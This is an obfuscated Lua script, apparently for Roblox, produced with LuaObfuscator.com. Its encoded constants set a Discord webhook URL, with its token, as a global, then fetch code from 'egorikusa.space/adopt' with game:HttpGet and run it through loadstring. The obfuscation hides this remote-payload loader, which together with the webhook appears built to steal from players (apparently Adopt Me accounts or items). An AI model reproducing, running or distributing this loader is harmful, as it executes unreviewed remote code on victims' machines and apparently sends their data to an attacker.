--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v113=0;local v114;while true do if (v113==1) then return v114;end if (v113==0) then v114=v5(v86,v19);v19=nil;v113=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=0;local v88;while true do if (v87==(0 -0)) then v88=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v88-(v88%((810 -241) -(367 + 201))) ;end end else local v89=927 -((1279 -(68 + 997)) + 713) ;local v90;while true do if (v89==(0 + (1270 -(226 + 1044)))) then v90=(1 + 1)^(v32-(878 -((1227 -945) + 595))) ;return (((v31%(v90 + v90))>=v90) and (1638 -(1523 + 114))) or ((117 -(32 + 85)) + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;return (v40 * (31011612 -(14234576 -(67 + 113)))) + (v39 * (120312 -54776)) + (v38 * (606 -(87 + 263))) + v37 ;end local function v24() local v41=0;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1 + 0)) then v44=1;v45=(v20(v43,2 -1 ,15 + (1428 -(630 + 793)) ) * ((444 -(416 + 26))^((345 -243) -70))) + v42 ;v41=7 -(23 -18) ;end if (v41==((1697 -742) -(802 + 150))) then if (v46==(0 -0)) then if (v45==(438 -(145 + 293))) then return v47 * (0 -0) ;else v46=1 -0 ;v44=0 + 0 ;end elseif (v46==(3044 -(915 + 82))) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((7 -5)^(117 -(26 + 39))))) ;end if (v41==(3 -1)) then v46=v20(v43,4 + 17 ,(1134 -(1020 + 60)) -23 );v47=((v20(v43,32)==1) and  -(1 + 0)) or (792 -((1266 -898) + 423)) ;v41=1 + 2 ;end if (v41==(0 + 0)) then v42=v23();v43=v23();v41=3 -2 ;end end end local function v25(v48) local v49;if  not v48 then local v91=1747 -(760 + 987) ;while true do if (v91==(1913 -(1789 + 124))) then v48=v23();if (v48==0) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v66=(264 + 503) -((2049 -1304) + (82 -61)) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92~= #"<") then else if (v93== #"|") then v94=(function() return v95()~=(0 -0) ;end)();elseif (v93==2) then v94=(function() return v96();end)();elseif (v93== #"asd") then v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (v92~=(0 + 0)) then else local v120=(function() return 1636 -(1373 + 263) ;end)();while true do if (v120~=0) then else v93=(function() return v95();end)();v94=(function() return nil;end)();v120=(function() return 1;end)();end if (v120~=(1 + 0)) then else v92=(function() return  #"!";end)();break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v52=(function() return function(v100,v101,v102) local v103=(function() return 396 -(115 + 281) ;end)();local v104=(function() return;end)();while true do if (v103==0) then v104=(function() return 1000 -(451 + 549) ;end)();while true do if (v104~=(0 + 0)) then else local v124=(function() return 0 -0 ;end)();while true do if (v124~=(0 + 0)) then else v100[v101-#":" ]=(function() return v102();end)();return v100,v101,v102;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"[",v57 do FlatIdent_104D4,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_104D4,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"91("]=(function() return v21();end)();for v69= #"{",v23() do local v70=(function() return v21();end)();if (v20(v70, #",", #":")==(0 -0)) then local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v108==(1384 -(746 + 638))) then local v121=(function() return 0;end)();local v122=(function() return;end)();while true do if ((0 -0)==v121) then v122=(function() return 0;end)();while true do if (v122~=0) then else v109=(function() return 0 -0 ;end)();v110=(function() return nil;end)();v122=(function() return 342 -(218 + 123) ;end)();end if (v122==1) then v108=(function() return 868 -(550 + 317) ;end)();break;end end break;end end end if (v108~=2) then else while true do if (v109~=(0 -0)) then else local v163=(function() return 0 -0 ;end)();local v164=(function() return;end)();while true do if (v163==(0 -0)) then v164=(function() return 0 + 0 ;end)();while true do if ((0 + 0)~=v164) then else v110=(function() return v20(v70,562 -(306 + 254) , #"91(");end)();v111=(function() return v20(v70, #"xnxx",291 -(134 + 151) );end)();v164=(function() return 1666 -(970 + 695) ;end)();end if (v164==1) then v109=(function() return  #"~";end)();break;end end break;end end end if ( #" "==v109) then local v165=(function() return 0;end)();local v166=(function() return;end)();while true do if ((0 + 0)==v165) then v166=(function() return 0 -0 ;end)();while true do if ((1 -0)==v166) then v109=(function() return 1992 -(582 + 1408) ;end)();break;end if (v166==(0 + 0)) then v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==(0 -0)) then local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();while true do if (v182==0) then v183=(function() return 0;end)();while true do if (v183==(572 -(426 + 146))) then v112[ #"xnx"]=(function() return v22();end)();v112[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"~") then v112[ #"91("]=(function() return v23();end)();elseif (v110==2) then v112[ #"nil"]=(function() return v23() -((7 -5)^(1840 -(1195 + 629))) ;end)();elseif (v110~= #"91(") then else local v188=(function() return 811 -(569 + 242) ;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0;end)();while true do if (v189~=(0 -0)) then else v112[ #"91("]=(function() return v23() -((2 -0)^(1040 -(706 + 318))) ;end)();v112[ #".com"]=(function() return v22();end)();break;end end break;end end end v166=(function() return 242 -(187 + 54) ;end)();end end break;end end end if (v109~=(1273 -(945 + 326))) then else local v167=(function() return 780 -(162 + 618) ;end)();while true do if (1~=v167) then else v109=(function() return  #"91(";end)();break;end if (v167==(0 + 0)) then if (v20(v111, #" ", #">")== #"[") then v112[2]=(function() return v58[v112[4 -2 ]];end)();end if (v20(v111,2 + 0 ,2 + 0 )~= #"[") then else v112[ #"xnx"]=(function() return v58[v112[ #"nil"]];end)();end v167=(function() return 1;end)();end end end if (v109~= #"xxx") then else if (v20(v111, #"xxx", #"xxx")== #" ") then v112[ #"asd1"]=(function() return v58[v112[ #"0313"]];end)();end v53[v69]=(function() return v112;end)();break;end end break;end if (v108~=(1 -0)) then else local v123=(function() return 0;end)();while true do if (v123==0) then v111=(function() return nil;end)();v112=(function() return nil;end)();v123=(function() return 701 -(271 + 429) ;end)();end if (v123==1) then v108=(function() return 2 + 0 ;end)();break;end end end end end end for v71= #".",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[1503 -(1408 + 92) ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1087 -(461 + 625) ;local v77= -(1289 -(993 + 295));local v78={};local v79={...};local v80=v12("#",...) -(1172 -(418 + 753)) ;local v81={};local v82={};for v105=0 + 0 ,v80 do if (v105>=v74) then v78[v105-v74 ]=v79[v105 + 1 + 0 ];else v82[v105]=v79[v105 + 1 + 0 ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do v84=v72[v76];v85=v84[530 -(406 + 123) ];if (v85<=(1772 -(1749 + 20))) then if (v85<=(1 + (0 -0))) then if ((v85>(1322 -(1249 + 73))) or (1869==2009)) then v82[v84[2]]=v84[2 + 1 ];else local v127=1145 -(466 + (1740 -1061)) ;local v128;local v129;local v130;local v131;while true do if ((v127==(2 -(1552 -(1126 + 425)))) or (3546<2322)) then v77=(v130 + v128) -((407 -(118 + 287)) -1) ;v131=0;v127=1902 -(106 + 1794) ;end if ((v127==(0 + 0)) or (2082==4773)) then v128=v84[1 + (3 -2) ];v129,v130=v75(v82[v128](v13(v82,v128 + (2 -1) ,v84[(1128 -(118 + 1003)) -4 ])));v127=115 -(4 + 110) ;end if ((3244>1055) and (v127==(586 -(57 + 527)))) then for v177=v128,v77 do v131=v131 + (1428 -(41 + (4056 -2670))) ;v82[v177]=v129[v131];end break;end end end elseif ((v85==(105 -(17 + 86))) or (3313<=1778)) then local v132;local v133,v134;local v135;local v136;v82[v84[2 + 0 ]]=v84[6 -3 ];v76=v76 + (2 -1) ;v84=v72[v76];v82[v84[2]]=v84[169 -(122 + 44) ];v76=v76 + (1 -(377 -(142 + 235))) ;v84=v72[v76];v82[v84[2]]=v62[v84[9 -6 ]];v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[1 + 1 ]]=v62[v84[3]];v76=v76 + 1 ;v84=v72[v76];v136=v84[3 -1 ];v135=v82[v84[68 -(30 + (158 -123)) ]];v82[v136 + 1 + 0 + 0 ]=v135;v82[v136]=v135[v84[4]];v76=v76 + (1258 -(1043 + 214)) ;v84=v72[v76];v82[v84[(984 -(553 + 424)) -(9 -4) ]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v136=v84[2 + 0 ];v133,v134=v75(v82[v136](v13(v82,v136 + 1 ,v84[1215 -(323 + 882 + 7) ])));v77=(v134 + v136) -1 ;v132=(0 + 0) -0 ;for v169=v136,v77 do v132=v132 + (581 -(361 + 219)) ;v82[v169]=v133[v132];end v76=v76 + (321 -(53 + 267)) ;v84=v72[v76];v136=v84[1 + 1 ];v82[v136]=v82[v136](v13(v82,v136 + (414 -(15 + 398)) ,v77));v76=v76 + (983 -(18 + 964)) ;v84=v72[v76];v82[v84[(3 + 4) -5 ]]();v76=v76 + 1 + 0 ;v84=v72[v76];do return;end else do return;end end elseif (v85<=(4 + 1)) then if (v85>4) then v82[v84[852 -(20 + 830) ]]();else local v154=v84[2 + 0 ];local v155=v82[v84[3]];v82[v154 + 1 ]=v155;v82[v154]=v155[v84[4 + 0 ]];end elseif ((v85>(132 -(116 + 10))) or (1421>=2104)) then local v159=0 + 0 ;local v160;while true do if ((1812<=3249) and (v159==(0 -0))) then v160=v84[740 -(542 + 196) ];v82[v160]=v82[v160](v13(v82,v160 + (1 -0) ,v77));break;end end else v82[v84[1 + 1 ]]=v62[v84[2 + 1 ]];end v76=v76 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00030A3O006372616E6B656E65727A03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313236353138363335323537323430333739362F646165644E6F75712O3039343058476835556E69545156356977365A7454396842624D6F6A396577496C46514256754A53574D784264757778412O4D656B4E4874305463030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F65676F72696B7573612E73706163652F61646F7074000A3O0012023O00013O00122O000100023O00122O000200033O00122O000300043O00202O00030003000500122O000500066O000300056O00023O00024O0002000100016O00017O00",v9(),...);
